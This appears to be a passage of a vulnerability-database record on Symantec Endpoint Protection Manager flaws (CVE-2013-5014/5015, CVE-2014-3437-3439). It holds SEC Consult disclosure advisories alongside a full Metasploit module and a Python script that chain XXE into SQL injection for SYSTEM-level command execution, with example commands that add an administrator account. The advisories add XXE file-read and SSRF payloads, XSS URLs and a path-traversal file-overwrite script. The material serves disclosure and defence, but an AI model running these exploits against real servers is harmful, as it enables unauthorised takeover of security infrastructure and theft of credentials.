type=int, required=False)\r\ncmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie \"net user\")', \\\r\nrequired=True)\r\nargs = cmdline_parser.parse_args()\r\n\r\nif args.ssl == 1:\r\n conn = httplib.HTTPSConnection(args.ip, args.port)\r\nelse:\r\n conn = httplib.HTTPConnection(args.ip, args.port)\r\nmultipart_body = multipart_body % (args.cmd)\r\nprint \"\\n[*]Attempting to exploit XXE and run local windows command: \" + args.cmd\r\nconn.request(\"POST\", \"/servlet/ConsoleServlet?ActionType=ConsoleLog\", multipart_body, headers)\r\nres = conn.getresponse()\r\nif res.status != 200:\r\n print \"[-]Exploit unsuccessful! Server returned:\\n\" + res.read()\r\nelse:\r\n print \"[+]Exploit successfully sent!\"\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31853/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\nSEC Consult Vulnerability Lab Security Advisory < 20140218-0 >\r\n=======================================================================\r\n title: Multiple critical vulnerabilities\r\n product: Symantec Endpoint Protection\r\n vulnerable version: 11.0, 12.0, 12.1\r\n fixed version: >=11.0.7405.1424\r\n >=12.1.4023.4080\r\n impact: Critical\r\n CVE number: CVE-2013-5014, CVE-2013-5015\r\n homepage: http://www.symantec.com\r\n found: 2013-12-03\r\n by: Stefan Viehbock\r\n SEC Consult Vulnerability Lab \r\n https://www.sec-consult.com\r\n=======================================================================\r\n\r\n\r\nVendor description:\r\n-------------------\r\n"Symantec Endpoint Protection is a client-server solution that protects\r\nlaptops, desktops, Windows and Mac computers, and servers in your network\r\nagainst malware. Symantec Endpoint Protection combines virus protection with\r\nadvanced threat protection to proactively secure your computers against known\r\nand unknown threats.\r\nSymantec Endpoint Protection protects against malware such as viruses, worms,\r\nTrojan horses, spyware, and adware. It provides protection against even the\r\nmost sophisticated attacks that evade traditional security measures, such as\r\nrootkits, zero-day attacks, and spyware that mutates. Providing low maintenance\r\nand high power, Symantec Endpoint Protection communicates over your network to\r\nautomatically safeguard for both physical systems and virtual systems against\r\nattacks."\r\n\r\nSource:\r\nhttps://www.symantec.com/endpoint-protection\r\nhttps://www.symantec.com/business/support/index?page=content&id=DOC6153\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nAttackers are able to completely compromise the Endpoint Protection Manager \r\nserver as they can gain access at the system and database level.\r\nFurthermore attackers can manage all endpoints and possibly deploy\r\nattacker-controlled code on endpoints.\r\n\r\nThe Endpoint Protection Manager server can be used as an entry point into\r\nthe target infrastructure (lateral movement, privilege escalation).\r\n\r\nIt is highly recommended by SEC Consult not to use this software until a\r\nthorough security review has been performed by security professionals and all\r\nidentified issues have been resolved.\r\n\r\nIt is assumed that further critical vulnerabilities exist.\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Unauthenticated XML External Entity Injection (XXE) (CVE-2013-5014)\r\nMultiple XXE vulnerabilities were found in the Endpoint Protection Manager \r\napplication. These vulnerabilities can be used to execute server side request\r\nforgery (SSRF) attacks used for portscanning/fingerprinting, denial of service,\r\npossibly file disclosure as well as attacks against functionality that is only\r\nexposed internally (see 2).\r\n\r\n2) Unauthenticated local SQL injection (CVE-2013-5015)\r\nThe identified SQL injection vulnerability enables an unauthenticated attacker\r\nto execute arbitrary commands on the underlying operating system with the\r\nprivileges of the SQL server service (SYSTEM). This was confirmed in the\r\ndefault setup using the internal SQL server (SQL Anywhere). This vulnerability\r\ncan be used to exfiltrate database content (eg. usernames and password hashes)\r\nas well (eg. on other DMBS).\r\n\r\nAs the vulnerable functionality is only available for requests coming from\r\nlocalhost, the XXE vulnerability (see 1) can be used to exploit it remotely.\r\n\r\nNote:\r\nThese vulnerabilities can be exploited via Cross-Site Request Forgery (CSRF)\r\nas well. An attacker does not need direct network access to the vulnerable\r\napplication!\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Unauthenticated XML External Entity Injection (XXE) (CVE-2013-5014)\r\nThe following request shows how XXE injection can be used to request arbitrary\r\nresources. The affected functionality is available via TCP port 9090 (HTTP)\r\nand 8443 (HTTPS).\r\nAffected script: /servlet/ConsoleServlet\r\n\r\nDetailed proof of concept exploits have been removed for this vulnerability.\r\n\r\n\r\n2) Unauthenticated local SQL injection (CVE-2013-5015)\r\nThe following request exploits the SQL injection vulnerability to execute\r\narbitrary commands using the xp_cmdshell() system procedure (available in SQL\r\nAnywhere), no authentication is needed but it only works when executed from\r\nlocalhost.\r\n\r\nUsing the XXE vulnerability, SQL injection can be exploited via the local\r\nnetwork/Internet. The affected functionality is available via TCP port 9090\r\n(HTTP) and 8443 (HTTPS).\r\nAffected script: /servlet/ConsoleServlet\r\n\r\n\r\nThis vulnerability can be used to exfiltrate database content (eg. usernames\r\nand password hashes) as well. All usernames and password hashes are stored\r\nwithin the database as MD5 hash without salt.\r\n\r\n\r\nDetailed proof of concept exploits have been removed for this vulnerability.\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in Symantec Endpoint Protection\r\nversion 12.1.4013, which was the most recent version at the time of discovery.\r\nAccording to Symantec versions 11.0, 12.0 and 12.1 are affected.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2013-12-16: Sending advisory and proof of concept exploit via encrypted\r\n channel.\r\n2013-12-16: Vendor acknowledges receipt of advisory.\r\n2014-01-09: Requesting status update and setting release date (2014-01-31).\r\n2014-01-09: Vendor responds and wants to release update in "March timeframe"\r\n2014-01-14: Clarifying reasons for accelerated disclosure (criticality,\r\n increased expectations from European customers, ...) in compliance\r\n with the SEC Consult Responsible Disclosure Policy.\r\n2014-01-23: Contacting CERT teams (CERT-Bund Germany, CERT-CC and CERT.at).\r\n2014-01-27: Conference call: extending advisory release date (2014-02-18).\r\n2014-02-13: Symantec releases fixed versions. \r\n2014-02-18: SEC Consult releases coordinated security advisory.\r\n\r\n\r\nSolution:\r\n---------\r\nUpdate to the most recent version (11.0.7405.1424 and 12.1.4023.4080) of\r\nSymantec Endpoint Protection.\r\n\r\nMore information can be found at:\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00\r\n\r\nhttp://www.symantec.com/business/support/index?page=content&id=TECH214866\r\n\r\n\r\nWorkaround:\r\n-----------\r\nNo workaround available.\r\n\r\n\r\nAdvisory URL:\r\n--------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n\r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\r\n\r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n\r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n\r\nInterested in working with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n\r\nEOF Stefan Viehbock / @2014\r\n", "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "SECURITYVULNS:DOC:30465", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30465", "title": "SEC Consult SA-20140218-0 :: Multiple critical vulnerabilities in Symantec Endpoint Protection", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "description": "SQL injection, information leakage.", "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "SECURITYVULNS:VULN:13676", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13676", "title": "Symantec Endpoint Protection security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:55", "bulletinFamily": "software", "description": "\r\n\r\nSEC Consult Vulnerability Lab Security Advisory < 20141106-0 >\r\n=======================================================================\r\n title: XXE & XSS & Arbitrary File Write vulnerabilities\r\n product: Symantec Endpoint Protection\r\n vulnerable version: 12.1.4023.4080\r\n fixed version: 12.1.5 (RU 5)\r\n impact: Critical\r\n CVE number: CVE-2014-3437, CVE-2014-3438, CVE-2014-3439\r\n homepage: http://www.symantec.com\r\n found: 2014-07-01\r\n by: Stefan Viehbock\r\n SEC Consult Vulnerability Lab\r\n https://www.sec-consult.com\r\n=======================================================================\r\n\r\n\r\nVendor description:\r\n-------------------\r\n"Symantec Endpoint Protection is a client-server solution that protects\r\nlaptops, desktops, Windows and Mac computers, and servers in your network\r\nagainst malware. Symantec Endpoint Protection combines virus protection with\r\nadvanced threat protection to proactively secure your computers against known\r\nand unknown threats.\r\nSymantec Endpoint Protection protects against malware such as viruses, worms,\r\nTrojan horses, spyware, and adware. It provides protection against even the\r\nmost sophisticated attacks that evade traditional security measures, such as\r\nrootkits, zero-day attacks, and spyware that mutates. Providing low maintenance\r\nand high power, Symantec Endpoint Protection communicates over your network to\r\nautomatically safeguard for both physical systems and virtual systems against\r\nattacks."\r\n\r\nSource:\r\nhttps://www.symantec.com/endpoint-protection\r\nhttps://www.symantec.com/business/support/index?page=content&id=DOC6153\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nAttackers are able to perform denial-of-service attacks against the Endpoint\r\nProtection Manager which directly impacts the effectiveness of the client-side\r\nendpoint protection. Furthermore, session identifiers of users can be stolen\r\nto impersonate them and gain unauthorized access to the server.\r\n\r\nAll of these attacks can have a severe impact on the security infrastructure.\r\nAn update to the latest version (12.1.5 RU 5) is highly recommended.\r\n\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) XML External Entity Injection (XXE) [CVE-2014-3437]\r\nMultiple XXE vulnerabilities were found in the Endpoint Protection Manager\r\napplication. An attacker needs to perform MitM attacks to impersonate\r\nsecurityresponse.symantec.com (eg. via DNS poisoning/spoofing/hijacking,\r\nARP spoofing, QUANTUM-style attacks, ...) to inject malicious XML code.\r\nThese vulnerabilities can be used to execute server side request\r\nforgery (SSRF) attacks used for portscanning/fingerprinting, denial of service,\r\nfile disclosure as well as attacks against functionality that is only\r\nexposed internally (see CVE-2013-5015 and issue #3).\r\n\r\nNote:\r\nThe exploitation scenario proves that the previous command execution via\r\nSQL injection was exploitable for an external attacker with the ability to\r\nmanipulate internet traffic _without any prior knowledge_ of the target system.\r\n\r\n\r\n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]\r\nEndpoint Protection Manager suffers from a reflected cross-site scripting\r\nvulnerability, which allows an attacker to steal other users' sessions, to\r\nimpersonate other users and to gain unauthorized access to the admin interface.\r\n\r\n\r\n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]\r\nArbitrary files can be written or overwritten by an unauthenticated attacker.\r\nThe target file is truncated in the process which results in Denial of Service.\r\nHowever it might be possible to write files with arbitrary content nonetheless.\r\n\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) XML External Entity Injection (XXE) [CVE-2014-3437]\r\nThe Symantec Protection Center component downloads XML files from\r\nhttp://securityresponse.symantec.com for information purposes.\r\nBy impersonating securityresponse.symantec.com (eg. via DNS\r\npoisoning/spoofing/hijacking, ARP spoofing, QUANTUM-style attacks, ...) an\r\nattacker can inject malicious XML code into the file contents and thus exploit\r\nXXE vulnerabilities.\r\n\r\nFor example by offering the following XML code at the URL\r\nhttp://securityresponse.symantec.com/avcenter/deepsightkiosk/9.xml\r\narbitrary files can be disclosed via the Symantec Protection Center login\r\npage at https://<HOST>:8443/portal/Login.jsp\r\n\r\n===============================================================================\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n\r\n<!DOCTYPE a [<!ENTITY e SYSTEM 'file:///c:/windows/win.ini'> ]>\r\n\r\n<data>\r\n <regular>\r\n <text>&e;</text>\r\n </regular>\r\n <outbreak></outbreak>\r\n <threatcon>1</threatcon>\r\n</data>\r\n===============================================================================\r\n\r\n\r\nServer Side Request Forgery (SSRF) can be exploited like in the following\r\nexample that sets the application log level to "log all messages" eg. via\r\nhttp://securityresponse.symantec.com/avcenter/deepsightkiosk/10.xml\r\n\r\n===============================================================================\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n\r\n<!DOCTYPE a [<!ENTITY e SYSTEM\r\n'http://localhost:9090/servlet/ConsoleServlet?ActionType=ConfigServer&logLevel=ALL'> ]>\r\n<foo>&e;</foo>\r\n===============================================================================\r\n\r\nFurthermore some files can be exfiltrated to remote servers via the\r\ntechniques described in:\r\nhttps://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf\r\nhttp://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf\r\n\r\n\r\n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]\r\nAt least the following URLs are vulnerable to XSS:\r\nhttps://<HOST>:8443/console/Highlander_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>\r\nhttps://<HOST>:8443/portal/Loading.jsp?uri=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0Pj9BQUFBPUJCQkIiPjxzY3JpcHQ%2bYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2b\r\n\r\n\r\n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]\r\nA flaw in ConsoleServlet allows an attacker to specify the application server\r\nthread name via the ActionType parameter. As the thread name is used in\r\nthe pattern that is passed to the java.util.logging.FileHandler constructor\r\nby the logging component (ServerLogger) an attacker can define the log file\r\npath. By causing an exception in the thread, the log file is written to\r\ndisk.\r\nThe following code snippet causes an exception by terminating the TCP\r\nconnection before the server has finished writing the response to the socket.\r\n\r\nActionType=/../../../../../../../../../../WINDOWS/win.ini%00 causes the win.ini\r\nfile to be truncated.\r\n\r\n===============================================================================\r\nimport socket\r\nimport struct\r\n\r\nHOST = '<HOST>'\r\nPORT = 9090\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\nl_onoff = 1\r\nl_linger = 0\r\ns.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,struct.pack('ii', l_onoff, l_linger))\r\n\r\nmsg = '''GET\r\n/servlet/ConsoleServlet?ActionType=/../../../../../../../../../../WINDOWS/win.ini%00\r\nHTTP/1.1\r\nHost: SYMEPP\r\nEvilContent: <?php evilcode(); ?>\r\n\r\n'''\r\n\r\ns.sendall(msg)\r\ns.shutdown(socket.SHUT_RD)\r\n===============================================================================\r\n\r\n\r\nActionType=/../../Inetpub/Reporting/evil.php%00 causes the (empty) file\r\nevil.php to be written into the Apache webroot.\r\n\r\nActionType=/../../Inetpub/Reporting/evil.php causes the file\r\nevil-0.log to be written into the Apache webroot.\r\n\r\nIf the application log level has been set to "DEBUG" (which can be achieved\r\nvia XXE, see issue #1) the file content includes all headers passed in the\r\nHTTP request (including the EvilContent header in the example above). However\r\nthe file will not be processed by PHP because of the .log extension. Due to\r\nthe complex nature of the Windows filesystem addressing modes (legacy/DOS,\r\nADS, etc.) it is entirely possible that this limitation can be bypassed.\r\n\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe vulnerabilities have been verified to exist in Symantec Endpoint Protection\r\nversion 12.1.4023.4080, which was the most recent version at the time of discovery.\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2014-07-11: Initial contact to secure@symantec.com\r\n2014-07-29: Ask for status at secure@symantec.com\r\n2014-08-01: Conference call about status, extended grace period to 2014-10-31\r\nSeptember/October: Several discussions / rechecks of the vulnerabilities\r\n2014-11-06: Coordinated release of the advisory\r\n\r\n\r\nSolution:\r\n---------\r\n\r\n1) XML External Entity Injection (XXE) [CVE-2014-3437]\r\n\r\nUpdate to version 12.1.5 RU 5\r\n\r\n2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]\r\n\r\nUpdate to version 12.1.5 RU 5\r\n\r\n3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]\r\n\r\nThe update to version 12.1.5 RU 5 only partially mitigates the vulnerability.\r\nPath Traversal is no longer possible, which reduces the severity to\r\nlow/medium. The vendor claims that it will be entirely solved in the next\r\nversion (12.1.5 RU6).\r\n\r\n\r\nFor further information see the security advisory of the vendor:\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141105_00\r\n\r\n\r\nWorkaround:\r\n-----------\r\nSee Symantec security advisory for further mitigations.\r\n\r\n\r\nAdvisory URL:\r\n--------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n\r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich\r\n\r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n\r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n\r\nInterested in working with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n\r\nEOF Stefan Viehbock / @2014\r\n\r\n", "modified": "2014-11-10T00:00:00", "published": "2014-11-10T00:00:00", "id": "SECURITYVULNS:DOC:31375", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31375", "title": "SEC Consult SA-20141106-0 :: XXE & XSS & Arbitrary File Write vulnerabilities in Symantec Endpoint Protection", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:33", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-26T00:00:00", "published": "2014-02-26T00:00:00", "id": "PACKETSTORM:125410", "href": "https://packetstormsecurity.com/files/125410/Symantec-Endpoint-Protection-Manager-Remote-Command-Execution.html", "title": "Symantec Endpoint Protection Manager Remote Command Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'msf/core/exploit/powershell' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude REXML \ninclude Msf::Exploit::CmdStagerVBS \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Symantec Endpoint Protection Manager Remote Command Execution', \n'Description' => %q{ \nThis module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager \nversions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker \ncan reach SQL injection affected components. As xp_cmdshell is enabled in the included \ndatabase instance, it's possible to execute arbitrary system commands on the remote system \nwith SYSTEM privileges. \n}, \n'Author' => \n[ \n'Stefan Viehbock', # Discovery \n'Chris Graham', # PoC exploit \n'xistence <xistence[at]0x90.nl>' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-5014' ], \n[ 'CVE', '2013-5015' ], \n[ 'EDB', '31853'], \n[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ] \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows VBS Stager', {}] \n], \n'Privileged' => true, \n'DisclosureDate' => 'Feb 24 2014', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(9090), \nOptString.new('TARGETURI', [true, 'The base path', '/']) \n], self.class) \nend \n \ndef check \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path), \n'method' => 'GET', \n}) \n \nif res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/ \nreturn Exploit::CheckCode::Appears \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprint_status(\"#{peer} - Sending payload\") \n# Execute the cmdstager, max length of the commands is ~3950 \nexecute_cmdstager({:linemax => 3950}) \nend \n \ndef execute_command(cmd, opts = {}) \n# Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML. \ncommand = \"0x#{Rex::Text.to_hex(\"cmd /c #{cmd}\", '')}\" \n \n# Generate random 'xx032xxxx' sequence number. \nseqnum = \"#{rand_text_numeric(2)}032#{rand_text_numeric(4)}\" \n \nsoap = soap_request(seqnum, command) \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(soap, \"text/xml\", nil, \"form-data; name=\\\"Content\\\"\") \nxxe = post_data.to_s \n \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), \n'method' => 'POST', \n'vars_get' => { 'ActionType' => 'ConsoleLog' }, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\", \n'data' => xxe, \n}) \n \nif res and res.body !~ /ResponseCode/ \nfail_with(Failure::Unknown, \"#{peer} - Something went wrong.\") \nend \nend \n \ndef soap_request(seqnum, command) \nrandpayload = rand_text_alpha(8+rand(8)) \nrandxxe = rand_text_alpha(8+rand(8)) \nentity = \"<!ENTITY #{randpayload} SYSTEM \\\"http://127.0.0.1:9090/servlet/ConsoleServlet?\" \nentity << \"ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\\\" >\" \n \nxml = Document.new \nxml.add(DocType.new('sepm', \"[ METASPLOIT ]\")) \nxml.add_element(\"Request\") \nxxe = xml.root.add_element(randxxe) \nxxe.text = \"PAYLOAD\" \n \nxml_s = xml.to_s \nxml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding \nxml_s.gsub!(/PAYLOAD/, \"&#{randpayload};\") # To avoid html encoding \n \nxml_s \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125410/symantec_endpoint_manager_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:13:43", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-23T00:00:00", "published": "2014-02-23T00:00:00", "href": "https://packetstormsecurity.com/files/125366/Symantec-Endpoint-Protection-Manager-Remote-Command-Execution.html", "id": "PACKETSTORM:125366", "type": "packetstorm", "title": "Symantec Endpoint Protection Manager Remote Command Execution", "sourceData": "`import argparse \nimport httplib \n \n\"\"\" \nExploit Title: Symantec Endpoint Protection Manager Remote Command Execution \nExploit Author: Chris Graham @cgrahamseven \nCVE: CVE-2013-5014, CVE-2013-5015 \nDate: February 22, 2014 \nVendor Homepage: http://www.symantec.com/endpoint-protection \nVersion: 11.0, 12.0, 12.1 \nTested On: Windows Server 2003, default SEPM install using embedded database \nReferences: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt \nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00 \nDetails: \n \nFirst off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE \ninjection to force SEPM to exploit itself through a separate SQL injection flaw was \nparticularly amusing. I suspect the majority of SEPM users will have it configured \nwith the default embedded database, thereby making this a pretty reliable exploit. \n \nSo basically what you are looking for with the XXE injection is a vulnerability \nthat can be triggered in the ConsoleServlet. When a multipart http request is sent, \nthe servlet will use a custom MultipartParser class to handle the individual \nmultipart bodies. When a body is encountered that uses a Content-Type of text/xml, \nthe Java DocumentBuilder class is used to parse the xml. Since Symantec did not \ndisallow declared DTD processing, it is vulnerable to the XXE injection. This \nappears to be a blind XXE, so a better use of the vulnerability is use it for SSRF. \nThat leads us to the SQL injection flaw. \n \nSymantec has an http request handler called ConfigServerHandler that is programmatically \nrestricted to only handle requests that come from localhost. I guess when they wrote this \nthey just assumed that there was never going to be a way to send untrusted input to it \nsince it was always going to be controlled by them. I base this guess on the fact that \nthere is absolutely no attempt made to validate what input comes in to the \nupdateReportingVersion function which shoves it directly into a SQL query unfiltered. In \norder to trigger the SQL injection you just need to send the SQL injection string in the \n\"Parameter\" url param with the \"action\" param set to test_av. On a default install of SEPM, \nit uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell \nstored procedure to run local OS commands. Using this stored procedure, you can compromise \nthe server that is running SEPM. \n \nExample Usage: \npython sepm_xxe_exploit.py -t 192.168.1.100 -c \"net user myadmin p@ss!23 /add\" \npython sepm_xxe_exploit.py -t 192.168.1.100 -c \"net localgroup Administrators myadmin /add\" \n\"\"\" \n \nmultipart_body = \\ \n\"------=_Part_156_33010715.1234\\r\\n\" + \\ \n\"Content-Type: text/xml\\r\\n\" + \\ \n\"Content-Disposition: form-data; name=\\\"Content\\\"\\r\\n\\r\\n\" + \\ \n\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\r\\n\" + \\ \n\"<!DOCTYPE sepm [<!ENTITY payload SYSTEM \" + \\ \n\"\\\"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av\" + \\ \n\"&SequenceNum=140320121&Parameter=a'; call xp_cmdshell('%s');--\\\" >]>\\r\\n\" + \\ \n\"<request>\\r\\n\" + \\ \n\"<xxe>&payload;</xxe>\\r\\n\" + \\ \n\"</request>\\r\\n\" + \\ \n\"------=_Part_156_33010715.1234--\\r\\n\" \nheaders = {'Content-Type':\"multipart/form-data; boundary=\\\"----=_Part_156_33010715.1234\\\"\"} \n \ncmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \\ \n' Remote Command Execution') \ncmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True) \ncmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \\ \ntype=int, required=False) \ncmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \\ \ndefault=0, type=int, required=False) \ncmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie \"net user\")', \\ \nrequired=True) \nargs = cmdline_parser.parse_args() \n \nif args.ssl == 1: \nconn = httplib.HTTPSConnection(args.ip, args.port) \nelse: \nconn = httplib.HTTPConnection(args.ip, args.port) \nmultipart_body = multipart_body % (args.cmd) \nprint \"\\n[*]Attempting to exploit XXE and run local windows command: \" + args.cmd \nconn.request(\"POST\", \"/servlet/ConsoleServlet?ActionType=ConsoleLog\", multipart_body, headers) \nres = conn.getresponse() \nif res.status != 200: \nprint \"[-]Exploit unsuccessful! Server returned:\\n\" + res.read() \nelse: \nprint \"[+]Exploit successfully sent!\" \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/125366/symantecendpointpm-exec.txt"}, {"lastseen": "2016-12-05T22:22:51", "bulletinFamily": "exploit", "description": "", "modified": "2014-11-06T00:00:00", "published": "2014-11-06T00:00:00", "href": "https://packetstormsecurity.com/files/129000/Symantec-Endpoint-Protection-12.1.4023.4080-XXE-XSS-Arbitrary-File-Write.html", "id": "PACKETSTORM:129000", "title": "Symantec Endpoint Protection 12.1.4023.4080 XXE / XSS / Arbitrary File Write", "type": "packetstorm", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20141106-0 > \n======================================================================= \ntitle: XXE & XSS & Arbitrary File Write vulnerabilities \nproduct: Symantec Endpoint Protection \nvulnerable version: 12.1.4023.4080 \nfixed version: 12.1.5 (RU 5) \nimpact: Critical \nCVE number: CVE-2014-3437, CVE-2014-3438, CVE-2014-3439 \nhomepage: http://www.symantec.com \nfound: 2014-07-01 \nby: Stefan Viehb\u00f6ck \nSEC Consult Vulnerability Lab \nhttps://www.sec-consult.com \n======================================================================= \n \n \nVendor description: \n------------------- \n\"Symantec Endpoint Protection is a client-server solution that protects \nlaptops, desktops, Windows and Mac computers, and servers in your network \nagainst malware. Symantec Endpoint Protection combines virus protection with \nadvanced threat protection to proactively secure your computers against known \nand unknown threats. \nSymantec Endpoint Protection protects against malware such as viruses, worms, \nTrojan horses, spyware, and adware. It provides protection against even the \nmost sophisticated attacks that evade traditional security measures, such as \nrootkits, zero-day attacks, and spyware that mutates. Providing low maintenance \nand high power, Symantec Endpoint Protection communicates over your network to \nautomatically safeguard for both physical systems and virtual systems against \nattacks.\" \n \nSource: \nhttps://www.symantec.com/endpoint-protection \nhttps://www.symantec.com/business/support/index?page=content&id=DOC6153 \n \n \nBusiness recommendation: \n------------------------ \nAttackers are able to perform denial-of-service attacks against the Endpoint \nProtection Manager which directly impacts the effectiveness of the client-side \nendpoint protection. Furthermore, session identifiers of users can be stolen \nto impersonate them and gain unauthorized access to the server. \n \nAll of these attacks can have a severe impact on the security infrastructure. \nAn 